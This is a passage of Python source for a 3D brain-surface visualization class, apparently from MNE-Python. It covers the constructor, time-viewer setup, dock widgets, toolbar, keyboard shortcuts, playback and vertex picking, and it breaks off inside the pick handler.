| ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_data` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_dipole` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_forward` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_head` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_labels` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_annotations` | - | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_sensors` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_skull` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_text` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`remove_volume_labels` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`save_image` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`save_movie` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`screenshot` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`show_view` | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | TimeViewer | ✓ | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`get_picked_points` | | ✓ | +-------------------------------------+--------------+---------------+ | :meth:`add_data(volume) <add_data>` | | ✓ | +-------------------------------------+--------------+---------------+ | view_layout | | ✓ | +-------------------------------------+--------------+---------------+ | 
flatmaps | | ✓ | +-------------------------------------+--------------+---------------+ | vertex picking | | ✓ | +-------------------------------------+--------------+---------------+ | label picking | | ✓ | +-------------------------------------+--------------+---------------+ """ def __init__(self, subject_id, hemi='both', surf='pial', title=None, cortex="classic", alpha=1.0, size=800, background="black", foreground=None, figure=None, subjects_dir=None, views='auto', offset='auto', show_toolbar=False, offscreen=False, interaction='trackball', units='mm', view_layout='vertical', silhouette=False, theme='auto', show=True, block=False): from ..backends.renderer import backend, _get_renderer if hemi is None: hemi = 'vol' hemi = self._check_hemi(hemi, extras=('both', 'split', 'vol')) if hemi in ('both', 'split'): self._hemis = ('lh', 'rh') else: assert hemi in ('lh', 'rh', 'vol') self._hemis = (hemi, ) self._view_layout = _check_option('view_layout', view_layout, ('vertical', 'horizontal')) if figure is not None and not isinstance(figure, int): backend._check_3d_figure(figure) if title is None: self._title = subject_id else: self._title = title self._interaction = 'trackball' self._bg_color = _to_rgb(background, name='background') if foreground is None: foreground = 'w' if sum(self._bg_color) < 2 else 'k' self._fg_color = _to_rgb(foreground, name='foreground') del background, foreground views = _check_views(surf, views, hemi) col_dict = dict(lh=1, rh=1, both=1, split=2, vol=1) shape = (len(views), col_dict[hemi]) if self._view_layout == 'horizontal': shape = shape[::-1] self._subplot_shape = shape size = tuple(np.atleast_1d(size).round(0).astype(int).flat) if len(size) not in (1, 2): raise ValueError('"size" parameter must be an int or length-2 ' 'sequence of ints.') size = size if len(size) == 2 else size * 2 # 1-tuple to 2-tuple subjects_dir = get_subjects_dir(subjects_dir) self.theme = theme self.time_viewer = False self._block = block self._hemi = hemi self._units = units self._alpha = float(alpha) self._subject_id = subject_id self._subjects_dir = subjects_dir self._views = views self._times = None self._vertex_to_label_id = dict() self._annotation_labels = dict() self._labels = {'lh': list(), 'rh': list()} self._unnamed_label_id = 0 # can only grow self._annots = {'lh': list(), 'rh': list()} self._layered_meshes = dict() self._actors = dict() self._elevation_rng = [15, 165] # range of motion of camera on theta self._lut_locked = None self._cleaned = False # default values for silhouette self._silhouette = { 'color': self._bg_color, 'line_width': 2, 'alpha': alpha, 'decimate': 0.9, } _validate_type(silhouette, (dict, bool), 'silhouette') if isinstance(silhouette, dict): self._silhouette.update(silhouette) self.silhouette = True else: self.silhouette = silhouette self._scalar_bar = None # for now only one time label can be added # since it is the same for all figures self._time_label_added = False # array of data used by TimeViewer self._data = {} self.geo = {} self.set_time_interpolation('nearest') geo_kwargs = self._cortex_colormap(cortex) # evaluate at the midpoint of the used colormap val = -geo_kwargs['vmin'] / (geo_kwargs['vmax'] - geo_kwargs['vmin']) self._brain_color = geo_kwargs['colormap'](val) # load geometry for one or both hemispheres as necessary _validate_type(offset, (str, bool), 'offset') if isinstance(offset, str): _check_option('offset', offset, ('auto',), extra='when str') offset = (surf in ('inflated', 'flat')) offset = None if (not offset or hemi != 'both') else 0.0 
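        # Note: ``offset`` is now either None (surfaces left in place) or 0.0,
        # which asks _Surface to shift each hemisphere along x so the two
        # meshes do not overlap (see the ``offset`` parameter documented
        # above).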
logger.debug(f'Hemi offset: {offset}') self._renderer = _get_renderer(name=self._title, size=size, bgcolor=self._bg_color, shape=shape, fig=figure) self._renderer._window_close_connect(self._clean) self._renderer._window_set_theme(theme) self.plotter = self._renderer.plotter self._setup_canonical_rotation() # plot hemis for h in ('lh', 'rh'): if h not in self._hemis: continue # don't make surface if not chosen # Initialize a Surface object as the geometry geo = _Surface(self._subject_id, h, surf, self._subjects_dir, offset, units=self._units, x_dir=self._rigid[0, :3]) # Load in the geometry and curvature geo.load_geometry() geo.load_curvature() self.geo[h] = geo for _, _, v in self._iter_views(h): if self._layered_meshes.get(h) is None: mesh = _LayeredMesh( renderer=self._renderer, vertices=self.geo[h].coords, triangles=self.geo[h].faces, normals=self.geo[h].nn, ) mesh.map() # send to GPU mesh.add_overlay( scalars=self.geo[h].bin_curv, colormap=geo_kwargs["colormap"], rng=[geo_kwargs["vmin"], geo_kwargs["vmax"]], opacity=alpha, name='curv', ) self._layered_meshes[h] = mesh # add metadata to the mesh for picking mesh._polydata._hemi = h else: actor = self._layered_meshes[h]._actor self._renderer.plotter.add_actor(actor, render=False) if self.silhouette: mesh = self._layered_meshes[h] self._renderer._silhouette( mesh=mesh._polydata, color=self._silhouette["color"], line_width=self._silhouette["line_width"], alpha=self._silhouette["alpha"], decimate=self._silhouette["decimate"], ) self._renderer.set_camera(update=False, reset_camera=False, **views_dicts[h][v]) self.interaction = interaction self._closed = False if show: self.show() # update the views once the geometry is all set for h in self._hemis: for ri, ci, v in self._iter_views(h): self.show_view(v, row=ri, col=ci, hemi=h) if surf == 'flat': self._renderer.set_interaction("rubber_band_2d") def _setup_canonical_rotation(self): from ...coreg import fit_matched_points, _trans_from_params self._rigid = np.eye(4) try: xfm = read_talxfm(self._subject_id, self._subjects_dir) except Exception: return # XYZ+origin + halfway pts_tal = np.concatenate([np.eye(4)[:, :3], np.eye(3) * 0.5]) pts_subj = apply_trans(invert_transform(xfm), pts_tal) # we fit with scaling enabled, but then discard it (we just need # the rigid-body components) params = fit_matched_points(pts_subj, pts_tal, scale=3, out='params') self._rigid[:] = _trans_from_params((True, True, False), params[:6]) def setup_time_viewer(self, time_viewer=True, show_traces=True): """Configure the time viewer parameters. Parameters ---------- time_viewer : bool If True, enable widgets interaction. Defaults to True. show_traces : bool If True, enable visualization of time traces. Defaults to True. Notes ----- The keyboard shortcuts are the following: '?': Display help window 'i': Toggle interface 's': Apply auto-scaling 'r': Restore original clim 'c': Clear all traces 'n': Shift the time forward by the playback speed 'b': Shift the time backward by the playback speed 'Space': Start/Pause playback 'Up': Decrease camera elevation angle 'Down': Increase camera elevation angle 'Left': Decrease camera azimuth angle 'Right': Increase camera azimuth angle """ from ..backends._utils import _qt_app_exec if self.time_viewer: return if not self._data: raise ValueError("No data to visualize. 
See ``add_data``.") self.time_viewer = time_viewer self.orientation = list(_lh_views_dict.keys()) self.default_smoothing_range = [-1, 15] # Default configuration self.playback = False self.visibility = False self.refresh_rate_ms = max(int(round(1000. / 60.)), 1) self.default_scaling_range = [0.2, 2.0] self.default_playback_speed_range = [0.01, 1] self.default_playback_speed_value = 0.01 self.default_status_bar_msg = "Press ? for help" self.default_label_extract_modes = { "stc": ["mean", "max"], "src": ["mean_flip", "pca_flip", "auto"], } self.default_trace_modes = ('vertex', 'label') self.annot = None self.label_extract_mode = None all_keys = ('lh', 'rh', 'vol') self.act_data_smooth = {key: (None, None) for key in all_keys} self.color_list = _get_color_list() # remove grey for better contrast on the brain self.color_list.remove("#7f7f7f") self.color_cycle = _ReuseCycle(self.color_list) self.mpl_canvas = None self.help_canvas = None self.rms = None self.picked_patches = {key: list() for key in all_keys} self.picked_points = {key: list() for key in all_keys} self.pick_table = dict() self._spheres = list() self._mouse_no_mvt = -1 self.callbacks = dict() self.widgets = dict() self.keys = ('fmin', 'fmid', 'fmax') # Derived parameters: self.playback_speed = self.default_playback_speed_value _validate_type(show_traces, (bool, str, 'numeric'), 'show_traces') self.interactor_fraction = 0.25 if isinstance(show_traces, str): self.show_traces = True self.separate_canvas = False self.traces_mode = 'vertex' if show_traces == 'separate': self.separate_canvas = True elif show_traces == 'label': self.traces_mode = 'label' else: assert show_traces == 'vertex' # guaranteed above else: if isinstance(show_traces, bool): self.show_traces = show_traces else: show_traces = float(show_traces) if not 0 < show_traces < 1: raise ValueError( 'show traces, if numeric, must be between 0 and 1, ' f'got {show_traces}') self.show_traces = True self.interactor_fraction = show_traces self.traces_mode = 'vertex' self.separate_canvas = False del show_traces self._configure_time_label() self._configure_scalar_bar() self._configure_shortcuts() self._configure_picking() self._configure_tool_bar() self._configure_dock() self._configure_menu() self._configure_status_bar() self._configure_playback() self._configure_help() # show everything at the end self.toggle_interface() self._renderer.show() # sizes could change, update views for hemi in ('lh', 'rh'): for ri, ci, v in self._iter_views(hemi): self.show_view(view=v, row=ri, col=ci) self._renderer._process_events() self._renderer._update() # finally, show the MplCanvas if self.show_traces: self.mpl_canvas.show() if self._block: _qt_app_exec(self._renderer.figure.store["app"]) @safe_event def _clean(self): # resolve the reference cycle self.clear_glyphs() self.remove_annotations() # clear init actors for hemi in self._hemis: self._layered_meshes[hemi]._clean() self._clear_callbacks() self._clear_widgets() if getattr(self, 'mpl_canvas', None) is not None: self.mpl_canvas.clear() if getattr(self, 'act_data_smooth', None) is not None: for key in list(self.act_data_smooth.keys()): self.act_data_smooth[key] = None # XXX this should be done in PyVista for renderer in self._renderer._all_renderers: renderer.RemoveAllLights() # app_window cannot be set to None because it is used in __del__ for key in ('lighting', 'interactor', '_RenderWindow'): setattr(self.plotter, key, None) # Qt LeaveEvent requires _Iren so we use _FakeIren instead of None # to resolve the ref to 
        # vtkGenericRenderWindowInteractor
        self.plotter._Iren = _FakeIren()
        if getattr(self.plotter, 'picker', None) is not None:
            self.plotter.picker = None
        # XXX end PyVista
        for key in ('plotter', 'window', 'dock', 'tool_bar', 'menu_bar',
                    'interactor', 'mpl_canvas', 'time_actor',
                    'picked_renderer', 'act_data_smooth', '_scalar_bar',
                    'actions', 'widgets', 'geo', '_data'):
            setattr(self, key, None)
        self._cleaned = True

    def toggle_interface(self, value=None):
        """Toggle the interface.

        Parameters
        ----------
        value : bool | None
            If True, the widgets are shown and if False, they are hidden.
            If None, the state of the widgets is toggled. Defaults to None.
        """
        if value is None:
            self.visibility = not self.visibility
        else:
            self.visibility = value
        # update tool bar and dock
        with self._renderer._window_ensure_minimum_sizes():
            if self.visibility:
                self._renderer._dock_show()
                self._renderer._tool_bar_update_button_icon(
                    name="visibility", icon_name="visibility_on")
            else:
                self._renderer._dock_hide()
                self._renderer._tool_bar_update_button_icon(
                    name="visibility", icon_name="visibility_off")
        self._renderer._update()

    def apply_auto_scaling(self):
        """Detect automatically fitting scaling parameters."""
        self._update_auto_scaling()

    def restore_user_scaling(self):
        """Restore original scaling parameters."""
        self._update_auto_scaling(restore=True)

    def toggle_playback(self, value=None):
        """Toggle time playback.

        Parameters
        ----------
        value : bool | None
            If True, automatic time playback is enabled and if False,
            it's disabled. If None, the state of time playback is toggled.
            Defaults to None.
        """
        if value is None:
            self.playback = not self.playback
        else:
            self.playback = value

        # update tool bar icon
        if self.playback:
            self._renderer._tool_bar_update_button_icon(
                name="play", icon_name="pause")
        else:
            self._renderer._tool_bar_update_button_icon(
                name="play", icon_name="play")

        if self.playback:
            time_data = self._data['time']
            max_time = np.max(time_data)
            if self._current_time == max_time:  # start over
                self.set_time_point(0)  # first index
            self._last_tick = time.time()

    def reset(self):
        """Reset view and time step."""
        self.reset_view()
        max_time = len(self._data['time']) - 1
        if max_time > 0:
            self.callbacks["time"](
                self._data["initial_time_idx"],
                update_widget=True,
            )
        self._renderer._update()

    def set_playback_speed(self, speed):
        """Set the time playback speed.

        Parameters
        ----------
        speed : float
            The speed of the playback.
        """
        self.playback_speed = speed

    @safe_event
    def _play(self):
        if self.playback:
            try:
                self._advance()
            except Exception:
                self.toggle_playback(value=False)
                raise

    def _advance(self):
        this_time = time.time()
        delta = this_time - self._last_tick
        self._last_tick = time.time()
        time_data = self._data['time']
        times = np.arange(self._n_times)
        time_shift = delta * self.playback_speed
        max_time = np.max(time_data)
        time_point = min(self._current_time + time_shift, max_time)
        # always use linear here -- this does not determine the data
        # interpolation mode, it just finds where we are (in time) in
        # terms of the time indices
        idx = np.interp(time_point, time_data, times)
        self.callbacks["time"](idx, update_widget=True)
        if time_point == max_time:
            self.toggle_playback(value=False)

    def _configure_time_label(self):
        self.time_actor = self._data.get('time_actor')
        if self.time_actor is not None:
            self.time_actor.SetPosition(0.5, 0.03)
            self.time_actor.GetTextProperty().SetJustificationToCentered()
            self.time_actor.GetTextProperty().BoldOn()

    def _configure_scalar_bar(self):
        if self._scalar_bar is not None:
            self._scalar_bar.SetOrientationToVertical()
            self._scalar_bar.SetHeight(0.6)
            self._scalar_bar.SetWidth(0.05)
            self._scalar_bar.SetPosition(0.02, 0.2)

    def _configure_dock_time_widget(self, layout=None):
        len_time = len(self._data['time']) - 1
        if len_time < 1:
            return
        layout = self._renderer.dock_layout if layout is None else layout
        hlayout = self._renderer._dock_add_layout(vertical=False)
        self.widgets["min_time"] = self._renderer._dock_add_label(
            value="-", layout=hlayout)
        self._renderer._dock_add_stretch(hlayout)
        self.widgets["current_time"] = self._renderer._dock_add_label(
            value="x", layout=hlayout)
        self._renderer._dock_add_stretch(hlayout)
        self.widgets["max_time"] = self._renderer._dock_add_label(
            value="+", layout=hlayout)
        self._renderer._layout_add_widget(layout, hlayout)
        min_time = float(self._data['time'][0])
        max_time = float(self._data['time'][-1])
        self.widgets["min_time"].set_value(f"{min_time: .3f}")
        self.widgets["max_time"].set_value(f"{max_time: .3f}")
        self.widgets["current_time"].set_value(f"{self._current_time: .3f}")

    def _configure_dock_playback_widget(self, name):
        layout = self._renderer._dock_add_group_box(name)
        len_time = len(self._data['time']) - 1

        # Time widget
        if len_time < 1:
            self.callbacks["time"] = None
            self.widgets["time"] = None
        else:
            self.callbacks["time"] = TimeCallBack(
                brain=self,
                callback=self.plot_time_line,
            )
            self.widgets["time"] = self._renderer._dock_add_slider(
                name="Time (s)",
                value=self._data['time_idx'],
                rng=[0, len_time],
                double=True,
                callback=self.callbacks["time"],
                compact=False,
                layout=layout,
            )
            self.callbacks["time"].widget = self.widgets["time"]

        # Time labels
        if len_time < 1:
            self.widgets["min_time"] = None
            self.widgets["max_time"] = None
            self.widgets["current_time"] = None
        else:
            self._configure_dock_time_widget(layout)
            self.callbacks["time"].label = self.widgets["current_time"]

        # Playback speed widget
        if len_time < 1:
            self.callbacks["playback_speed"] = None
            self.widgets["playback_speed"] = None
        else:
            self.callbacks["playback_speed"] = SmartCallBack(
                callback=self.set_playback_speed,
            )
            self.widgets["playback_speed"] = self._renderer._dock_add_spin_box(
                name="Speed",
                value=self.default_playback_speed_value,
                rng=self.default_playback_speed_range,
                callback=self.callbacks["playback_speed"],
                layout=layout,
            )
            self.callbacks["playback_speed"].widget = \
                self.widgets["playback_speed"]

        # Time label
        current_time = self._current_time
        assert current_time is not None  # should never be the case, float
        time_label = self._data['time_label']
        if callable(time_label):
            current_time = time_label(current_time)
        else:
            current_time = time_label
        if self.time_actor is not None:
            self.time_actor.SetInput(current_time)
        del current_time

    def _configure_dock_orientation_widget(self, name):
        layout = self._renderer._dock_add_group_box(name)
        # Renderer widget
        rends = [str(i) for i in range(len(self._renderer._all_renderers))]
        if len(rends) > 1:
            def select_renderer(idx):
                idx = int(idx)
                loc = self._renderer._index_to_loc(idx)
                self.plotter.subplot(*loc)

            self.callbacks["renderer"] = SmartCallBack(
                callback=select_renderer,
            )
            self.widgets["renderer"] = self._renderer._dock_add_combo_box(
                name="Renderer",
                value="0",
                rng=rends,
                callback=self.callbacks["renderer"],
                layout=layout,
            )
            self.callbacks["renderer"].widget = \
                self.widgets["renderer"]

        # Use 'lh' as a reference for orientation for 'both'
        if self._hemi == 'both':
            hemis_ref = ['lh']
        else:
            hemis_ref = self._hemis
        orientation_data = [None] * len(rends)
        for hemi in hemis_ref:
            for ri, ci, v in self._iter_views(hemi):
                idx = self._renderer._loc_to_index((ri, ci))
                if v == 'flat':
                    _data = None
                else:
                    _data = dict(default=v, hemi=hemi, row=ri, col=ci)
                orientation_data[idx] = _data
        self.callbacks["orientation"] = ShowView(
            brain=self,
            data=orientation_data,
        )
        self.widgets["orientation"] = self._renderer._dock_add_combo_box(
            name=None,
            value=self.orientation[0],
            rng=self.orientation,
            callback=self.callbacks["orientation"],
            layout=layout,
        )

    def _configure_dock_colormap_widget(self, name):
        layout = self._renderer._dock_add_group_box(name)
        self._renderer._dock_add_label(
            value="min / mid / max",
            align=True,
            layout=layout,
        )
        up = UpdateLUT(brain=self)
        for key in self.keys:
            hlayout = self._renderer._dock_add_layout(vertical=False)
            rng = _get_range(self)
            self.callbacks[key] = lambda value, key=key: up(**{key: value})
            self.widgets[key] = self._renderer._dock_add_slider(
                name=None,
                value=self._data[key],
                rng=rng,
                callback=self.callbacks[key],
                double=True,
                layout=hlayout,
            )
            self.widgets[f"entry_{key}"] = self._renderer._dock_add_spin_box(
                name=None,
                value=self._data[key],
                callback=self.callbacks[key],
                rng=rng,
                layout=hlayout,
            )
            up.widgets[key] = [self.widgets[key], self.widgets[f"entry_{key}"]]
            self._renderer._layout_add_widget(layout, hlayout)

        # reset / minus / plus
        hlayout = self._renderer._dock_add_layout(vertical=False)
        self._renderer._dock_add_label(
            value="Rescale",
            align=True,
            layout=hlayout,
        )
        self.widgets["reset"] = self._renderer._dock_add_button(
            name="↺",
            callback=self.restore_user_scaling,
            layout=hlayout,
            style='toolbutton',
        )
        for key, char, val in (("fminus", "➖", 1.2 ** -0.25),
                               ("fplus", "➕", 1.2 ** 0.25)):
            self.callbacks[key] = UpdateColorbarScale(
                brain=self,
                factor=val,
            )
            self.widgets[key] = self._renderer._dock_add_button(
                name=char,
                callback=self.callbacks[key],
                layout=hlayout,
                style='toolbutton',
            )
        self._renderer._layout_add_widget(layout, hlayout)

        # register colorbar slider representations
        widgets = {key: self.widgets[key] for key in self.keys}
        for name in ("fmin", "fmid", "fmax", "fminus", "fplus"):
            self.callbacks[name].widgets = widgets

    def _configure_dock_trace_widget(self, name):
        if not self.show_traces:
            return
        # do not show trace mode for volumes
        if (self._data.get('src', None) is not None and
                self._data['src'].kind == 'volume'):
            self._configure_vertex_time_course()
            return

        layout = self._renderer._dock_add_group_box(name)

        # setup candidate annots
        def _set_annot(annot):
            self.clear_glyphs()
            self.remove_labels()
            self.remove_annotations()
self.annot = annot if annot == 'None': self.traces_mode = 'vertex' self._configure_vertex_time_course() else: self.traces_mode = 'label' self._configure_label_time_course() self._renderer._update() # setup label extraction parameters def _set_label_mode(mode): if self.traces_mode != 'label': return glyphs = copy.deepcopy(self.picked_patches) self.label_extract_mode = mode self.clear_glyphs() for hemi in self._hemis: for label_id in glyphs[hemi]: label = self._annotation_labels[hemi][label_id] vertex_id = label.vertices[0] self._add_label_glyph(hemi, None, vertex_id) self.mpl_canvas.axes.relim() self.mpl_canvas.axes.autoscale_view() self.mpl_canvas.update_plot() self._renderer._update() from ...source_estimate import _get_allowed_label_modes from ...label import _read_annot_cands dir_name = op.join(self._subjects_dir, self._subject_id, 'label') cands = _read_annot_cands(dir_name, raise_error=False) cands = cands + ['None'] self.annot = cands[0] stc = self._data["stc"] modes = _get_allowed_label_modes(stc) if self._data["src"] is None: modes = [m for m in modes if m not in self.default_label_extract_modes["src"]] self.label_extract_mode = modes[-1] if self.traces_mode == 'vertex': _set_annot('None') else: _set_annot(self.annot) self.widgets["annotation"] = self._renderer._dock_add_combo_box( name="Annotation", value=self.annot, rng=cands, callback=_set_annot, layout=layout, ) self.widgets["extract_mode"] = self._renderer._dock_add_combo_box( name="Extract mode", value=self.label_extract_mode, rng=modes, callback=_set_label_mode, layout=layout, ) def _configure_dock(self): self._renderer._dock_initialize() self._configure_dock_playback_widget(name="Playback") self._configure_dock_orientation_widget(name="Orientation") self._configure_dock_colormap_widget(name="Color Limits") self._configure_dock_trace_widget(name="Trace") # Smoothing widget self.callbacks["smoothing"] = SmartCallBack( callback=self.set_data_smoothing, ) self.widgets["smoothing"] = self._renderer._dock_add_spin_box( name="Smoothing", value=self._data['smoothing_steps'], rng=self.default_smoothing_range, callback=self.callbacks["smoothing"], double=False ) self.callbacks["smoothing"].widget = \ self.widgets["smoothing"] self._renderer._dock_finalize() def _configure_playback(self): self._renderer._playback_initialize( func=self._play, timeout=self.refresh_rate_ms, value=self._data['time_idx'], rng=[0, len(self._data['time']) - 1], time_widget=self.widgets["time"], play_widget=self.widgets["play"], ) def _configure_mplcanvas(self): # Get the fractional components for the brain and mpl self.mpl_canvas = self._renderer._window_get_mplcanvas( brain=self, interactor_fraction=self.interactor_fraction, show_traces=self.show_traces, separate_canvas=self.separate_canvas ) xlim = [np.min(self._data['time']), np.max(self._data['time'])] with warnings.catch_warnings(): warnings.filterwarnings("ignore", category=UserWarning) self.mpl_canvas.axes.set(xlim=xlim) if not self.separate_canvas: self._renderer._window_adjust_mplcanvas_layout() self.mpl_canvas.set_color( bg_color=self._bg_color, fg_color=self._fg_color, ) def _configure_vertex_time_course(self): if not self.show_traces: return if self.mpl_canvas is None: self._configure_mplcanvas() else: self.clear_glyphs() # plot RMS of the activation y = np.concatenate(list(v[0] for v in self.act_data_smooth.values() if v[0] is not None)) rms = np.linalg.norm(y, axis=0) / np.sqrt(len(y)) del y self.rms, = self.mpl_canvas.axes.plot( self._data['time'], rms, lw=3, label='RMS', zorder=3, 
color=self._fg_color, alpha=0.5, ls=':') # now plot the time line self.plot_time_line(update=False) # then the picked points for idx, hemi in enumerate(['lh', 'rh', 'vol']): act_data = self.act_data_smooth.get(hemi, [None])[0] if act_data is None: continue hemi_data = self._data[hemi] vertices = hemi_data['vertices'] # simulate a picked renderer if self._hemi in ('both', 'rh') or hemi == 'vol': idx = 0 self.picked_renderer = self._renderer._all_renderers[idx] # initialize the default point if self._data['initial_time'] is not None: # pick at that time use_data = act_data[ :, [np.round(self._data['time_idx']).astype(int)]] else: use_data = act_data ind = np.unravel_index(np.argmax(np.abs(use_data), axis=None), use_data.shape) if hemi == 'vol': mesh = hemi_data['grid'] else: mesh = self._layered_meshes[hemi]._polydata vertex_id = vertices[ind[0]] self._add_vertex_glyph(hemi, mesh, vertex_id, update=False) def _configure_picking(self): # get data for each hemi from scipy import sparse for idx, hemi in enumerate(['vol', 'lh', 'rh']): hemi_data = self._data.get(hemi) if hemi_data is not None: act_data = hemi_data['array'] if act_data.ndim == 3: act_data = np.linalg.norm(act_data, axis=1) smooth_mat = hemi_data.get('smooth_mat') vertices = hemi_data['vertices'] if hemi == 'vol': assert smooth_mat is None smooth_mat = sparse.csr_matrix( (np.ones(len(vertices)), (vertices, np.arange(len(vertices))))) self.act_data_smooth[hemi] = (act_data, smooth_mat) self._renderer._update_picking_callback( self._on_mouse_move, self._on_button_press, self._on_button_release, self._on_pick ) def _configure_tool_bar(self): self._renderer._tool_bar_load_icons() self._renderer._tool_bar_set_theme(self.theme) self._renderer._tool_bar_initialize(name="Toolbar") self._renderer._tool_bar_add_file_button( name="screenshot", desc="Take a screenshot", func=self.save_image, ) self._renderer._tool_bar_add_file_button( name="movie", desc="Save movie...", func=lambda filename: self.save_movie( filename=filename, time_dilation=(1. 
                / self.playback_speed)),
            shortcut="ctrl+shift+s",
        )
        self._renderer._tool_bar_add_button(
            name="visibility",
            desc="Toggle Controls",
            func=self.toggle_interface,
            icon_name="visibility_on"
        )
        self.widgets["play"] = self._renderer._tool_bar_add_play_button(
            name="play",
            desc="Play/Pause",
            func=self.toggle_playback,
            shortcut=" ",
        )
        self._renderer._tool_bar_add_button(
            name="reset",
            desc="Reset",
            func=self.reset,
        )
        self._renderer._tool_bar_add_button(
            name="scale",
            desc="Auto-Scale",
            func=self.apply_auto_scaling,
        )
        self._renderer._tool_bar_add_button(
            name="clear",
            desc="Clear traces",
            func=self.clear_glyphs,
        )
        self._renderer._tool_bar_add_spacer()
        self._renderer._tool_bar_add_button(
            name="help",
            desc="Help",
            func=self.help,
            shortcut="?",
        )

    def _shift_time(self, op):
        self.callbacks["time"](
            value=(op(self._current_time, self.playback_speed)),
            time_as_index=False,
            update_widget=True,
        )

    def _rotate_azimuth(self, value):
        azimuth = (self._renderer.figure._azimuth + value) % 360
        self._renderer.set_camera(azimuth=azimuth, reset_camera=False)

    def _rotate_elevation(self, value):
        elevation = np.clip(
            self._renderer.figure._elevation + value,
            self._elevation_rng[0],
            self._elevation_rng[1],
        )
        self._renderer.set_camera(elevation=elevation, reset_camera=False)

    def _configure_shortcuts(self):
        # First, we remove the default bindings:
        self._clear_callbacks()
        # Then, we add our own:
        self.plotter.add_key_event("i", self.toggle_interface)
        self.plotter.add_key_event("s", self.apply_auto_scaling)
        self.plotter.add_key_event("r", self.restore_user_scaling)
        self.plotter.add_key_event("c", self.clear_glyphs)
        self.plotter.add_key_event("n", partial(self._shift_time,
                                                op=lambda x, y: x + y))
        self.plotter.add_key_event("b", partial(self._shift_time,
                                                op=lambda x, y: x - y))
        for key, func, sign in (("Left", self._rotate_azimuth, 1),
                                ("Right", self._rotate_azimuth, -1),
                                ("Up", self._rotate_elevation, 1),
                                ("Down", self._rotate_elevation, -1)):
            self.plotter.add_key_event(key, partial(func, sign * _ARROW_MOVE))

    def _configure_menu(self):
        self._renderer._menu_initialize()
        self._renderer._menu_add_submenu(
            name="help",
            desc="Help",
        )
        self._renderer._menu_add_button(
            menu_name="help",
            name="help",
            desc="Show MNE key bindings\t?",
            func=self.help,
        )

    def _configure_status_bar(self):
        self._renderer._status_bar_initialize()
        self.status_msg = self._renderer._status_bar_add_label(
            self.default_status_bar_msg, stretch=1)
        self.status_progress = self._renderer._status_bar_add_progress_bar()
        if self.status_progress is not None:
            self.status_progress.hide()

    def _on_mouse_move(self, vtk_picker, event):
        if self._mouse_no_mvt:
            self._mouse_no_mvt -= 1

    def _on_button_press(self, vtk_picker, event):
        self._mouse_no_mvt = 2

    def _on_button_release(self, vtk_picker, event):
        if self._mouse_no_mvt > 0:
            x, y = vtk_picker.GetEventPosition()
            # programmatically detect the picked renderer
            try:  # pyvista<0.30.0
                self.picked_renderer = \
                    self.plotter.iren.FindPokedRenderer(x, y)
            except AttributeError:  # pyvista>=0.30.0
                self.picked_renderer = \
                    self.plotter.iren.interactor.FindPokedRenderer(x, y)
            # trigger the pick
            self.plotter.picker.Pick(x, y, 0, self.picked_renderer)
        self._mouse_no_mvt = 0

    def _on_pick(self, vtk_picker, event):
        if not self.show_traces:
            return

        # vtk_picker is a vtkCellPicker
        cell_id = vtk_picker.GetCellId()
        mesh = vtk_picker.GetDataSet()

        if mesh is None or cell_id == -1 or not self._mouse_no_mvt:
            return  # don't pick

        # 1) Check to see if there are any spheres along the ray
        if len(self._spheres):
            collection = vtk_picker.GetProp3Ds()
            found_sphere = None
            for ii in range(collection.GetNumberOfItems()):
                actor = collection.GetItemAsObject(ii)
                for sphere in self._spheres:
                    if any(a is actor for a in sphere._actors):
                        found_sphere = sphere
                        break
                if found_sphere is not None:
                    break
            if found_sphere is not None:
                assert found_sphere._is_glyph
                mesh = found_sphere

        # 2) Remove sphere if it's what we have
        if hasattr(mesh, "_is_glyph"):
            self._remove_vertex_glyph(mesh)
            return

        # 3) Otherwise, pick the objects in the scene
        try:
            hemi = mesh._hemi
        except AttributeError:  # volume
            hemi = 'vol'
        else:
            assert hemi in ('lh', 'rh')
        if self.act_data_smooth[hemi][0] is None:  # no data to add for hemi
            return
        pos = np.array(vtk_picker.GetPickPosition())
        if hemi == 'vol':
            # VTK will give us the point closest to the viewer in the vol.
            # We want to pick the point with the maximum value along the
            # camera-to-click array, which fortunately we can get "just"
            # by inspecting the points that are sufficiently close to the
            # ray.
            grid = mesh = self._data[hemi]['grid']
            vertices = self._data[hemi]['vertices']
            coords = self._data[hemi]['grid_coords'][vertices]
            scalars = _cell_data(grid)['values'][vertices]
            spacing = np.array(grid.GetSpacing())
            max_dist = np.linalg.norm(spacing) / 2.
            origin = vtk_picker.GetRenderer().GetActiveCamera().GetPosition()
            ori = pos - origin
            ori /= np.linalg.norm(ori)
            # the magic formula: distance from a ray to a given point
            dists = np.linalg.norm(np.cross(ori, coords - pos), axis=1)
            assert dists.shape == (len(coords),)
            mask = dists <= max_dist
            idx = np.where(mask)[0]
            if len(idx) == 0:
                return  # weird point on edge of volume?
            # useful for debugging the ray by mapping it into the volume:
            # dists = dists - dists.min()
            # dists = (1. - dists / dists.max()) * self._cmap_range[1]
            # _cell_data(grid)['values'][vertices] = dists * mask
            idx = idx[np.argmax(np.abs(scalars[idx]))]
            vertex_id = vertices[idx]
            # Naive way: convert pos directly to idx; i.e., apply mri_src_t
            # shape = self._data[hemi]['grid_shape']
            # taking into account the cell vs point difference (spacing/2)
            # shift = np.array(grid.GetOrigin()) + spacing / 2.
